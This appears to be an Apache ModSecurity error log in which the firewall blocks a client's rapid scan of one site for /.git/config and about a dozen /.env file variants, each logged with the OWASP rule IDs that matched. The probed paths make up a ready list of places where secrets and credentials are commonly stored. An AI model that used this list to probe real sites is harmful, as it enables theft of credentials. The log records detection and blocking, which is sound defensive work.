[Mon May 11 17:35:44.902898 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agH3UPy_GXSWIKeli0sNKQAAAIE"]
[Mon May 11 17:35:45.292950 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env"] [unique_id "agH3Ufy_GXSWIKeli0sNLAAAAIE"]
[Mon May 11 17:35:45.293196 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env"] [unique_id "agH3Ufy_GXSWIKeli0sNLAAAAIE"]
[Mon May 11 17:35:45.293473 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env"] [unique_id "agH3Ufy_GXSWIKeli0sNLAAAAIE"]
[Mon May 11 17:35:45.490391 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.local"] [unique_id "agH3Ufy_GXSWIKeli0sNLQAAAIE"]
[Mon May 11 17:35:45.490634 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.local"] [unique_id "agH3Ufy_GXSWIKeli0sNLQAAAIE"]
[Mon May 11 17:35:45.490884 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.local"] [unique_id "agH3Ufy_GXSWIKeli0sNLQAAAIE"]
[Mon May 11 17:35:45.752236 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.production"] [unique_id "agH3Ufy_GXSWIKeli0sNLgAAAIE"]
[Mon May 11 17:35:45.752484 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.production"] [unique_id "agH3Ufy_GXSWIKeli0sNLgAAAIE"]
[Mon May 11 17:35:45.752723 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.production"] [unique_id "agH3Ufy_GXSWIKeli0sNLgAAAIE"]
[Mon May 11 17:35:46.025634 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.staging"] [unique_id "agH3Uvy_GXSWIKeli0sNLwAAAIE"]
[Mon May 11 17:35:46.025867 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.staging"] [unique_id "agH3Uvy_GXSWIKeli0sNLwAAAIE"]
[Mon May 11 17:35:46.026112 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.staging"] [unique_id "agH3Uvy_GXSWIKeli0sNLwAAAIE"]
[Mon May 11 17:35:46.123118 2026] [authz_core:error] [pid 1411201:tid 1411249] [client 176.120.22.46:61763] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/sodium_compat/src/error_log, referer: http://www.labaujue.com/wp-includes/sodium_compat/src/
[Mon May 11 17:35:46.286842 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.development"] [unique_id "agH3Uvy_GXSWIKeli0sNMQAAAIE"]
[Mon May 11 17:35:46.287078 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.development"] [unique_id "agH3Uvy_GXSWIKeli0sNMQAAAIE"]
[Mon May 11 17:35:46.287341 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.development"] [unique_id "agH3Uvy_GXSWIKeli0sNMQAAAIE"]
[Mon May 11 17:35:46.500982 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.test"] [unique_id "agH3Uvy_GXSWIKeli0sNMgAAAIE"]
[Mon May 11 17:35:46.501212 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.test"] [unique_id "agH3Uvy_GXSWIKeli0sNMgAAAIE"]
[Mon May 11 17:35:46.501441 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.test"] [unique_id "agH3Uvy_GXSWIKeli0sNMgAAAIE"]
[Mon May 11 17:35:46.672929 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.remote"] [unique_id "agH3Uvy_GXSWIKeli0sNMwAAAIE"]
[Mon May 11 17:35:46.673175 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.remote"] [unique_id "agH3Uvy_GXSWIKeli0sNMwAAAIE"]
[Mon May 11 17:35:46.673425 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.remote"] [unique_id "agH3Uvy_GXSWIKeli0sNMwAAAIE"]
[Mon May 11 17:35:46.888347 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.bak"] [unique_id "agH3Uvy_GXSWIKeli0sNNAAAAIE"]
[Mon May 11 17:35:46.888581 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.bak"] [unique_id "agH3Uvy_GXSWIKeli0sNNAAAAIE"]
[Mon May 11 17:35:46.888824 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.bak"] [unique_id "agH3Uvy_GXSWIKeli0sNNAAAAIE"]
[Mon May 11 17:35:47.146315 2026] [security2:error] [pid 1412074:tid 1412081] [client 49.233.45.47:57500] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecf.com"] [uri "/"] [unique_id "agH3UzJnyuKVXoStDhbONAAAAEU"]
[Mon May 11 17:35:47.194038 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.backup"] [unique_id "agH3U_y_GXSWIKeli0sNNgAAAIE"]
[Mon May 11 17:35:47.194294 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.backup"] [unique_id "agH3U_y_GXSWIKeli0sNNgAAAIE"]
[Mon May 11 17:35:47.194532 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.backup"] [unique_id "agH3U_y_GXSWIKeli0sNNgAAAIE"]
[Mon May 11 17:35:47.403859 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.save"] [unique_id "agH3U_y_GXSWIKeli0sNNwAAAIE"]
[Mon May 11 17:35:47.404030 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.save"] [unique_id "agH3U_y_GXSWIKeli0sNNwAAAIE"]
[Mon May 11 17:35:47.404252 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.save"] [unique_id "agH3U_y_GXSWIKeli0sNNwAAAIE"]
[Mon May 11 17:35:47.752961 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.old"] [unique_id "agH3U_y_GXSWIKeli0sNOAAAAIE"]
[Mon May 11 17:35:47.753196 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.old"] [unique_id "agH3U_y_GXSWIKeli0sNOAAAAIE"]
[Mon May 11 17:35:47.753432 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.old"] [unique_id "agH3U_y_GXSWIKeli0sNOAAAAIE"]
[Mon May 11 17:35:48.007773 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.sample"] [unique_id "agH3VPy_GXSWIKeli0sNOgAAAIE"]
[Mon May 11 17:35:48.007966 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.sample"] [unique_id "agH3VPy_GXSWIKeli0sNOgAAAIE"]
[Mon May 11 17:35:48.008220 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.sample"] [unique_id "agH3VPy_GXSWIKeli0sNOgAAAIE"]
[Mon May 11 17:35:48.245528 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.example"] [unique_id "agH3VPy_GXSWIKeli0sNOwAAAIE"]
[Mon May 11 17:35:48.245758 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.example"] [unique_id "agH3VPy_GXSWIKeli0sNOwAAAIE"]
